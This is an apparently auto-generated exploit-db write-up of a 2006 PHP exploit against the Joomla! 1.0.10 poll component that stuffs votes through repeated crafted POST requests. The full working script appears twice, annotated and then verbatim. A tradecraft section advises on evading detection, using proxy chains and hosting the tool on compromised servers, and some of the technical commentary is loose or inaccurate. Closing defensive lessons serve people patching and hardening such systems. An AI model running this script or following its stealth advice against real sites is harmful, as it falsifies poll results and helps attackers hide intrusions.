By exploitdb papers bot•August 19, 2006•
papers
Exploiting Joomla! Poll Component 1.0.10 for Arbitrary Vote Addition
Exploiting Joomla! Poll Component 1.0.10 for Arbitrary Vote Addition
What this paper is
This paper describes a vulnerability in the Joomla! Poll Component version 1.0.10. The vulnerability allows an attacker to add an unlimited number of votes to any poll option without proper authorization. The exploit is delivered via a PHP script that automates the process of sending crafted HTTP requests to the vulnerable Joomla! installation.
Simple technical breakdown
The core of the vulnerability lies in how the poll component handles vote submissions. It appears to lack sufficient checks to prevent repeated voting or to properly validate the source of the vote. The exploit script leverages this by repeatedly sending POST requests to the com_poll&task=vote endpoint, effectively tricking the server into counting each request as a valid vote.
The script first attempts to discover the session cookie name used by the Joomla! site. If it can't find it, it generates a likely name. Then, it constructs a series of HTTP POST requests to the voting endpoint. Each request includes a voteid parameter, which, when manipulated, targets a specific poll option. By sending many of these requests in rapid succession, the attacker inflates the vote count for the chosen option.
Complete code and payload walkthrough
The provided PHP script acts as an exploit client. It presents a web form to the user to gather necessary information and then constructs and sends HTTP requests to the target Joomla! site.
Here's a breakdown of the code:
1. Initial Setup and HTML Form:
<?php
# Joomla [poll component] add unlimited votes #
# Computer Security Researchers Institute #
# works regardless of php.ini settings #
# by trueend5 #
# [http://www.KAPDA.ir] #
error_reporting(0); // Suppress all error reporting for a cleaner output.
ini_set("max_execution_time",0); // Set maximum execution time to unlimited.
ini_set("default_socket_timeout", 2); // Set default socket timeout to 2 seconds.
ob_implicit_flush (1); // Automatically flush output buffers.
echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Joomla [poll component] arbitrary add votes</title>
</head>
<body bgcolor="#FFCCFF">
<p align="center"><font size="4" color="#0000FF">Joomla [poll
component] arbitrary add votes</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><b><a href="http://www.kapda.ir"><font color="#000000">KAPDA</font></a>.ir</b></p>
<p align="center"> </p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
<p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex: www.sitename.com)</span></p>
<p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex: /joomla/
or just / )</span></p>
<p><input name="pollid" size="20"> <span class="Stile5"><font color="#FF0000">
*</font> pollid (ex: index.php?option=com_poll&task=results&<b><font size="4">id=14</font></b> )</span></p>
<p><input name="voteid" size="20"><span class="Stile5"><font color="#FF0000">
*</font> voteid ( <b><u>1</u></b> for first option, <b><u>2</u></b>
for second one , <b><u>3</u></b> for third and so... )</span></p>
<p><input name="hits" size="20"><span class="Stile5"><font color="#FF0000">
*</font>
hits ( number of votes that you want to add ) </span></p>
<p><input name="port" size="20"><span class="Stile5"> specify a port
(default: 80)</span></p>
<p><input name="proxy" size="20" ><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">
* </font>fields are required</span></p>
<p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form></td></tr></tbody></table></body></html>';- Purpose: This section initializes the script, sets some PHP configurations for better network handling, and displays an HTML form.
- Inputs: The form collects
host,path,pollid,voteid,hits,port, andproxyfrom the user. - Behavior: It sets up the user interface for the exploit.
- Output: An HTML page with input fields for the target and exploit parameters.
2. show() function:
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}- Purpose: This function takes a string (likely an HTTP request or response) and displays it in a hex dump format, along with the ASCII representation of the characters. This is useful for debugging and understanding the raw network traffic.
- Inputs:
$headeri(string to display). - Behavior: It iterates through the input string, converts each byte to its hexadecimal representation, and formats it into a table.
- Output: An HTML table showing the hex dump and ASCII characters of the input string.
3. sendpacket() function (unused in the final execution flow):
function sendpacket()
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}- Purpose: This function is an alternative method for sending raw network packets using PHP's socket functions. It handles direct connections or connections through a proxy.
- Inputs: Global variables:
$proxy,$host,$port,$packet,$html,$proxy_regex. - Behavior: It creates a socket, connects to the target (directly or via proxy), sends the
$packet, reads the response into$html, and closes the socket. - Output: Populates the global
$htmlvariable with the server's response.
4. sendpacketii() function (used in the exploit flow):
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
//echo nl2br(htmlentities($html));
}- Purpose: This function sends raw HTTP requests and retrieves the response. It's the primary function used for interacting with the target server. It supports direct connections and proxy connections.
- Inputs:
$packet(the HTTP request string). Global variables:$proxy,$host,$port,$html,$proxy_regex. - Behavior:
- If no proxy is specified, it uses
fsockopento connect directly to the target host and port. - If a proxy is specified, it validates the proxy format, connects to the proxy, and then sends the packet through the proxy.
- It writes the
$packetto the socket. - It reads the response from the socket into the global
$htmlvariable. For proxy connections, it reads until it encounters a double CRLF (\r\n\r\n), which signifies the end of HTTP headers. - It closes the socket.
- If no proxy is specified, it uses
- Output: Populates the global
$htmlvariable with the server's response.
5. Main Execution Logic:
$host=trim($_POST[host]);
$path=trim($_POST[path]);
$port=intval(trim($_POST[port]));
$pollid=intval(trim($_POST[pollid]));
$voteid=intval(trim($_POST[voteid]));
$hits=intval(trim($_POST[hits]));
if (($host<>'') and ($path<>'') and ($pollid<>'') and ($voteid<>'') and ($hits<>''))
{
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
if ($port=='') {$port=80;}
if ($hits=='') {$hits=200;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$livesite=$host;
if ($path=='/') {$livepath='';} else $livepath=substr("$path", 0, strlen($path)-1);
$sessionpath='http://'.$livesite.$livepath;
$packet="HEAD ".$p."index.php HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
//trying to obtain cookiename from HEADER
$pattern="([a-z0-9]{32}=)";
if(preg_match($pattern, $html, $matches)) {$match=$matches[0];
$sessionCookieName=substr("$match", 0, strlen($match)-1);
} else
//trying to generate cookiename
{$sessionCookieName= md5( 'site'.$sessionpath );}
for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
else {
for ($n = 2; $n <= $hits; $n++) {
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
echo "<br />".$n.":added.";
}
echo "<br /> Exploit succeeded <br />";
echo'<p align="center"><a href="'.$sessionpath.'/index.php?option=com_poll&task=results&id='.$pollid.'"><font color="#0000FF">Results</font></a></p>';
}
}
else
{echo 'Fill in requested fields, optionally specify a proxy';}
?>- Purpose: This is the main execution block that processes user input, constructs exploit packets, and sends them to the target.
- Inputs: User-submitted form data (
host,path,pollid,voteid,hits,port,proxy). - Behavior:
- Input Sanitization and Defaults: Retrieves and trims user input. Sets default
portto 80 andhitsto 200 if not provided. Validates thepathformat. - Construct Target URL: Builds the base URL for the target Joomla! installation.
- Initial HEAD Request: Sends a
HEADrequest toindex.phpto probe the server and potentially retrieve information like session cookie names.- Packet:
HEAD /joomla/index.php HTTP/1.1 User-Agent: Shareaza v1.x.x.xx Host: www.sitename.com Connection: Close - Purpose: To get an initial response from the server, which might contain clues about session management. The
User-Agentis likely a decoy.
- Packet:
- Session Cookie Name Discovery:
- It attempts to find a 32-character hexadecimal string followed by an equals sign (
=) in the response headers. This pattern is common for session cookie names (e.g.,PHPSESSID=). - If no such pattern is found, it generates a fallback session cookie name using
md5('site' . $sessionpath). This is a heuristic guess.
- It attempts to find a 32-character hexadecimal string followed by an equals sign (
- Vote ID Manipulation:
for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}: This loop seems to be an attempt to adjust thevoteidbased on thepollid. The logic is unclear and potentially flawed, as adding 12 repeatedly might not correctly map to the desired vote option if thepollidis significantly larger than 14. It's possible this was an attempt to bypass some form of rate limiting or to target specific poll structures, but its exact purpose is not fully explained.
- First Vote Submission (POST Request):
- Constructs a
POSTrequest to the poll voting endpoint. - Packet:
POST /joomla/index.php?option=com_poll&task=vote&id=14&PHPSESSID=1 HTTP/1.0 Host: www.sitename.com Content-Type: application/x-www-form-urlencoded Content-Length: 10 voteid=1PHPSESSIDand1are placeholders for discovered/generated cookie name and value, andvoteidis the value from user input, potentially modified by the loop.) - Purpose: To cast the initial vote. The
idparameter specifies the poll, andvoteidspecifies the option. ThesessionCookieName=1part is crucial; it's injecting a fake session cookie to potentially bypass some checks or to ensure a valid-looking request.
- Constructs a
- Redirection Check: It checks if the response contains a
Locationheader. ALocationheader typically indicates a successful redirection after an action, implying the vote submission was processed. - Loop for Multiple Votes: If the initial vote submission appears successful (indicated by a
Locationheader), it enters a loop to cast the specified number of votes ($hits).- Packet (inside loop): Identical to the first vote submission packet.
- Purpose: To repeatedly send the vote submission request, thereby adding multiple votes.
- Behavior: For each iteration, it sends the
POSTrequest and checks for theLocationheader. If theLocationheader is missing at any point, it declares the exploit failed.
- Success/Failure Output: Reports whether the exploit succeeded or failed and provides a link to view the poll results if successful.
- Input Sanitization and Defaults: Retrieves and trims user input. Sets default
- Output: Displays progress, success/failure messages, and a link to poll results.
Payload/Shellcode:
There is no traditional shellcode or executable payload in this script. The "payload" is the crafted HTTP POST request that exploits the vulnerability. The script itself is the attacker's tool.
Code Fragment/Block -> Practical Purpose Mapping:
error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1);-> Script Initialization & Network Tuning: Optimizes the script for network operations and suppresses errors for a cleaner user experience.echo '<html>...</html>';-> User Interface: Displays the HTML form for user input.function show($headeri)-> Debugging & Traffic Analysis: Provides a hex dump of network traffic for inspection.function sendpacketii($packet)-> Network Communication: Handles sending HTTP requests and receiving responses, supporting direct and proxy connections.$host=trim($_POST[host]); ... $hits=intval(trim($_POST[hits]));-> Input Gathering: Collects target and exploit parameters from the user.if (($host<>'') and ...)-> Input Validation & Pre-processing: Checks if all required fields are filled and performs basic sanitization.HEAD ...request block -> Information Gathering: Probes the target to identify session cookie names.$pattern="([a-z0-9]{32}=)"; if(preg_match(...))-> Session Cookie Discovery: Attempts to automatically detect the Joomla! session cookie name.else {$sessionCookieName= md5( 'site'.$sessionpath );}-> Session Cookie Fallback: Generates a default session cookie name if detection fails.for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}-> Vote ID Adjustment (Obscure): Modifies thevoteidbased onpollid, purpose not fully clear.POST ...?option=com_poll&task=vote&id=...&'.$sessionCookieName.'=1 HTTP/1.0 ... voteid=...-> Exploitation Packet: The core request that triggers the vote addition.if (!eregi("Location",$html))-> Exploit Success Check: Verifies if the server responded with a redirect, indicating successful processing.for ($n = 2; $n <= $hits; $n++) { ... sendpacketii($packet); ... }-> Repetitive Voting Loop: Executes the exploit packet multiple times to add the desired number of votes.echo'<p align="center"><a href="'.$sessionpath.'/index.php?option=com_poll&task=results&id='.$pollid.'">Results</a></p>';-> Post-Exploitation Feedback: Provides a link to view the results of the manipulated poll.
Practical details for offensive operations teams
- Required Access Level: Typically requires network access to the target Joomla! instance. No prior authentication or specific user privileges are needed if the poll component is publicly accessible.
- Lab Preconditions:
- A vulnerable Joomla! installation (version 1.0.10 with the poll component).
- A known poll ID and a valid
voteidfor an option within that poll. - The exploit script needs to be hosted on a web server accessible by the operator, or run locally if the operator has a PHP environment.
- Tooling Assumptions:
- A web browser to interact with the exploit script's HTML form.
- A PHP interpreter to run the exploit script.
- Network connectivity to the target.
- Optional: A proxy server (like Burp Suite or OWASP ZAP) can be used to intercept and analyze traffic, or to forward the exploit requests if the target is only accessible via a proxy.
- Execution Pitfalls:
- Incorrect
pollidorvoteid: If these are wrong, the exploit will fail to target the intended poll or option. - Incorrect
path: The script expects a specific path format (e.g.,/joomla/or/). An incorrect path will lead to 404 errors or other misconfigurations. - Server-side WAF/IDS: Modern Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the repetitive POST requests or the specific patterns in the HTTP headers/body, leading to blocking or alerting.
- Rate Limiting: The target server might have rate-limiting mechanisms that could slow down or block the exploit if too many requests are sent too quickly. The
default_socket_timeoutof 2 seconds in the script might be too high for rapid-fire attacks. - Session Cookie Obfuscation: If the Joomla! installation uses a highly custom or unpredictable session cookie naming convention, the script's discovery mechanism might fail, and the generated fallback might not work.
- PHP Configuration: While the script attempts to work regardless of
php.inisettings, extremely restrictive server configurations (e.g., disabledfsockopenorsocketfunctions) could prevent it from running. - HTTP Version Mismatch: The script uses HTTP/1.0. If the target server strictly enforces HTTP/1.1, some aspects of the communication might behave unexpectedly.
- Vote ID Loop Logic: The
for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}loop's effectiveness is questionable and might not always result in the intendedvoteid.
- Incorrect
- Tradecraft Considerations:
- Reconnaissance: Before running the exploit, confirm the Joomla! version and the presence of the poll component. Identify the correct
pollidandvoteidfor the target poll option. - Stealth: The
User-Agentis generic. For more stealth, it could be randomized or mimic a legitimate browser. The exploit script itself should ideally be hosted on a compromised server or a dedicated infrastructure, not directly from the operator's IP if anonymity is critical. - Timing: Executing the exploit during off-peak hours might reduce the chance of immediate detection by administrators monitoring server load.
- Proxy Usage: Using a chain of proxies or a compromised server as a pivot point can help obfuscate the origin of the attack.
- Post-Exploitation: After successfully manipulating votes, the operator might want to document the results and potentially look for other vulnerabilities to escalate privileges or gain further access.
- Reconnaissance: Before running the exploit, confirm the Joomla! version and the presence of the poll component. Identify the correct
Where this was used and when
This exploit targets Joomla! version 1.0.10, which was released around 2006. Exploits for this version would have been relevant in the mid-to-late 2000s. While specific documented real-world attacks using this exact script are not readily available in public records, vulnerabilities in popular CMS components like this were commonly exploited by attackers during that era to deface websites, manipulate content, or gain initial footholds. The publication date of 2006-08-19 on exploit-db.com indicates it was a known vulnerability and exploit around that time.
Defensive lessons for modern teams
- Keep Software Updated: This is the most critical lesson. Running outdated versions of Content Management Systems (CMS) like Joomla! and their extensions is a primary vector for compromise. Regularly patch and update all components.
- Component Auditing: Understand which components are installed and their versions. Regularly audit for outdated or vulnerable extensions.
- Input Validation: Implement robust server-side validation for all user inputs, especially those that affect application logic or data integrity. This includes checking data types, lengths, and expected formats.
- Secure Voting Mechanisms:
- Rate Limiting: Implement rate limiting on sensitive actions like voting to prevent brute-force or repetitive submissions.
- CAPTCHA/Human Verification: For public voting systems, use CAPTCHAs or other human verification methods to distinguish legitimate users from automated scripts.
- Session Management: Ensure proper session handling and validation. Avoid relying on easily guessable session cookie names.
- IP Address/User Tracking: While not foolproof, tracking votes by IP address or logged-in user can help identify suspicious patterns. However, this needs careful consideration to avoid disenfranchising legitimate users.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common web attack patterns, including malformed requests, suspicious user agents, and repetitive POST requests to sensitive endpoints.
- Logging and Monitoring: Implement comprehensive logging of web server and application events. Monitor logs for unusual activity, such as a sudden spike in requests to the poll component or repeated failed attempts to access specific URLs.
- Component Security Reviews: Before deploying any third-party component, conduct a security review or rely on reputable sources that have vetted the component's security.
ASCII visual (if applicable)
This exploit is a client-server interaction. A simple visual representation of the exploit flow:
+-----------------+ +-----------------------+
| Attacker's | | Target Joomla! Server |
| Exploit Script | | (Poll Component) |
+-----------------+ +-----------------------+
| ^
| 1. User Input |
| (Host, Path, IDs) |
|----------------------->|
| |
| 2. HEAD Request |
| (Discover Cookie) |
|----------------------->|
| |
| 3. POST Request |
| (Initial Vote) |
|----------------------->|
| |
| 4. POST Request (x N) |
| (Repeat Vote) |
|----------------------->|
| |
| 5. Display Results |
|<-----------------------|Source references
- Paper URL: https://www.exploit-db.com/papers/2219
- Raw Exploit URL: https://www.exploit-db.com/raw/2219
- Joomla! Poll Component (vulnerable version): Information about the specific component and its vulnerability context can be inferred from the exploit's publication date and target software.
Original Exploit-DB Content (Verbatim)
<?php
# Joomla [poll component] add unlimited votes #
# Computer Security Researchers Institute #
# works regardless of php.ini settings #
# by trueend5 #
# [http://www.KAPDA.ir] #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Joomla [poll component] arbitrary add votes</title>
</head>
<body bgcolor="#FFCCFF">
<p align="center"><font size="4" color="#0000FF">Joomla [poll
component] arbitrary add votes</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><b><a href="http://www.kapda.ir"><font color="#000000">KAPDA</font></a>.ir</b></p>
<p align="center"> </p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
<p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex: www.sitename.com)</span></p>
<p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex: /joomla/
or just / )</span></p>
<p><input name="pollid" size="20"> <span class="Stile5"><font color="#FF0000">
*</font> pollid (ex: index.php?option=com_poll&task=results&<b><font size="4">id=14</font></b> )</span></p>
<p><input name="voteid" size="20"><span class="Stile5"><font color="#FF0000">
*</font> voteid ( <b><u>1</u></b> for first option, <b><u>2</u></b>
for second one , <b><u>3</u></b> for third and so... )</span></p>
<p><input name="hits" size="20"><span class="Stile5"><font color="#FF0000">
*</font>
hits ( number of votes that you want to add ) </span></p>
<p><input name="port" size="20"><span class="Stile5"> specify a port
(default: 80)</span></p>
<p><input name="proxy" size="20" ><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">
* </font>fields are required</span></p>
<p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form></td></tr></tbody></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket()
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
//echo nl2br(htmlentities($html));
}
$host=trim($_POST[host]);
$path=trim($_POST[path]);
$port=intval(trim($_POST[port]));
$pollid=intval(trim($_POST[pollid]));
$voteid=intval(trim($_POST[voteid]));
$hits=intval(trim($_POST[hits]));
if (($host<>'') and ($path<>'') and ($pollid<>'') and ($voteid<>'') and ($hits<>''))
{
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
if ($port=='') {$port=80;}
if ($hits=='') {$hits=200;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$livesite=$host;
if ($path=='/') {$livepath='';} else $livepath=substr("$path", 0, strlen($path)-1);
$sessionpath='http://'.$livesite.$livepath;
$packet="HEAD ".$p."index.php HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
//trying to obtain cookiename from HEADER
$pattern="([a-z0-9]{32}=)";
if(preg_match($pattern, $html, $matches)) {$match=$matches[0];
$sessionCookieName=substr("$match", 0, strlen($match)-1);
} else
//trying to generate cookiename
{$sessionCookieName= md5( 'site'.$sessionpath );}
for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
else {
for ($n = 2; $n <= $hits; $n++) {
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
echo "<br />".$n.":added.";
}
echo "<br /> Exploit succeeded <br />";
echo'<p align="center"><a href="'.$sessionpath.'/index.php?option=com_poll&task=results&id='.$pollid.'"><font color="#0000FF">Results</font></a></p>';
}
}
else
{echo 'Fill in requested fields, optionally specify a proxy';}
?>
# milw0rm.com [2006-08-19]